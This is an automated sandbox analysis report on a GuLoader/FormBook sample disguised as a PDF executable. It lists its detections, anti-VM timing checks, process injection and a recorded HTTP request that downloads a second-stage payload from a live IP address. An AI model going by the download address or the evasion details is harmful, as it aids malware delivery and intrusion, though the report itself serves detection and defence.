Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMAGE000Pdf.exe

Overview

General Information

Sample name:IMAGE000Pdf.exe
Analysis ID:1548539
MD5:53441f2de2d573f3b2e4fb35c248229b
SHA1:afc840f25adfcb5873f5b69e55b2920c370a2285
SHA256:5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • IMAGE000Pdf.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)
    • IMAGE000Pdf.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2445993498.0000000005213000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-04T16:08:14.078293+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549704TCP
      2024-11-04T16:08:53.376869+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549889TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-04T16:08:44.574237+010028032702Potentially Bad Traffic192.168.2.549845173.249.193.4880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: IMAGE000Pdf.exeAvira: detected
      Source: IMAGE000Pdf.exeReversingLabs: Detection: 13%
      Source: Yara matchFile source: 00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: IMAGE000Pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: IMAGE000Pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmp
      Source: Binary string: wntdll.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000003.2925211684.0000000034AF0000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923122471.000000003494F000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034CA0000.00000040.00001000.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034E3E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: IMAGE000Pdf.exe, IMAGE000Pdf.exe, 00000003.00000003.2925211684.0000000034AF0000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923122471.000000003494F000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034CA0000.00000040.00001000.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034E3E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmp
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49845 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49704
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49889
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/
      Source: IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin8J
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin8v
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binHI
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binlI/
      Source: IMAGE000Pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.00000000005F2000.00000008.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.00000000005F2000.00000008.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: initial sampleStatic PE information: Filename: IMAGE000Pdf.exe
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_6F931B5F0_2_6F931B5F
      Source: IMAGE000Pdf.exeStatic PE information: invalid certificate
      Source: IMAGE000Pdf.exe, 00000003.00000003.2925211684.0000000034C1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMAGE000Pdf.exe
      Source: IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034F71000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMAGE000Pdf.exe
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923122471.0000000034A72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMAGE000Pdf.exe
      Source: IMAGE000Pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@3/11@0/1
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\kretekniske.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nskBA98.tmpJump to behavior
      Source: IMAGE000Pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: IMAGE000Pdf.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile read: C:\Users\user\Desktop\IMAGE000Pdf.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile written: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
      Source: IMAGE000Pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmp
      Source: Binary string: wntdll.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000003.2925211684.0000000034AF0000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923122471.000000003494F000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034CA0000.00000040.00001000.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034E3E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: IMAGE000Pdf.exe, IMAGE000Pdf.exe, 00000003.00000003.2925211684.0000000034AF0000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923122471.000000003494F000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034CA0000.00000040.00001000.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3000415181.0000000034E3E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2445993498.0000000005213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_6F931B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F931B5F
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nslBEDE.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI/Special instruction interceptor: Address: 5222FD0
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI/Special instruction interceptor: Address: 2162FD0
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeRDTSC instruction interceptor: First address: 51F96E2 second address: 51F96E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F17AC502336h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeRDTSC instruction interceptor: First address: 21396E2 second address: 21396E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F17ACEF6846h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslBEDE.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exe TID: 7124Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHB
      Source: IMAGE000Pdf.exe, 00000003.00000003.2923373012.0000000004B7F000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973864207.0000000004B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-2286
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-2498
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_6F931B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F931B5F
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      12
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS22
      System Information Discovery
      Distributed Component Object ModelInput Capture11
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
